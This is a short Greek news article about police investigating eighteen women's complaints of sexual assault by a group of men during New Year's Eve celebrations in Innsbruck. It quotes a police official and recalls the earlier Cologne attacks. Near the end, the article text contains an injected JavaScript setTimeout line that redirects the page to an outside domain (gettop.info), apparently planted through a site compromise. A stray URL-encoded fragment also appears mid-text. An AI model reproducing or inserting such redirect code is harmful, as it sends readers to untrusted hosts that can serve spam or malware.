Θύελλα στην Αυστρία: Δεκάδες καταγγελίες για σεξουαλική παρενόχληση την Πρωτοχρονιά

0
12

 

Έρευνες διενεργεί η αστυνομία μετά από πολλές καταγγελίες για σεξουαλικές επιθέσεις που διέπραξε ομάδα ανδρών στο Ίνσμπρουκ, την παραμονή της Πρωτοχρονιάς.

Σύμφωνα με τις τοπικές αρχές, έχουν κατατεθεί μηνύσεις από 18 γυναίκες. Όλες τους υποστηρίζουν ότι δέχτηκαν επίθεση από μια ομάδα περίπου 10 ανδρών που έμοιαζαν με Άραβες και Βορειοαφρικανούς, κατά τους εορτασμούς του Νέου Έτους στην κεντρική πλατεία της πόλης, όπου είχαν συγκεντρωθεί 25.000 άνθρωποι.

«Δεν είχε συμβεί ποτέ κάτι παρόμοιο στο παρελθόν», σχολίασε στο Γαλλικό Πρακτορείο ο Ερνστ Κρανεμπίτερ της τοπικής αστυνομίας.
«Χόρευαν γύρω από τα θύματα και μετά, ξαφνικά, έπιαναν το στήθος τους ή έβαζαν τα χέρια τους ανάμεσα στα πόδια (των γυναικών). Όλα έγιναν κατά τη διάρκεια της γιορτής, με αποτέλεσμα δύσκολα να αντιληφθεί κάποιος τι συνέβαινε», πρόσθεσε.

%ce%b9%ce%bd%cf%83%ce%b2%ce%b8%cf%81%ce%b3

Οι δράστες ήταν «νέοι άνδρες», συνέχισε. Τα ερασιτεχνικά βίντεο που τραβήχθηκαν τη νύχτα της Πρωτοχρονιάς είναι κακής ποιότητας και για αυτό δεν βοηθούν στην ταυτοποίηση των υπόπτων.

Υπενθυμίζεται ότι πέρυσι την Πρωτοχρονιά είχαν σημειωθεί εκατοντάδες επιθέσεις εναντίον γυναικών στην Κολονία. Καταγγελίες είχαν γίνει επίσης και στην Αυστρία και για να αποφευχθεί επανάληψη των επιθέσεων η αυστριακή αστυνομία είχε μοιράσει «συναγερμούς τσέπης» σε 6.000 γυναίκες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here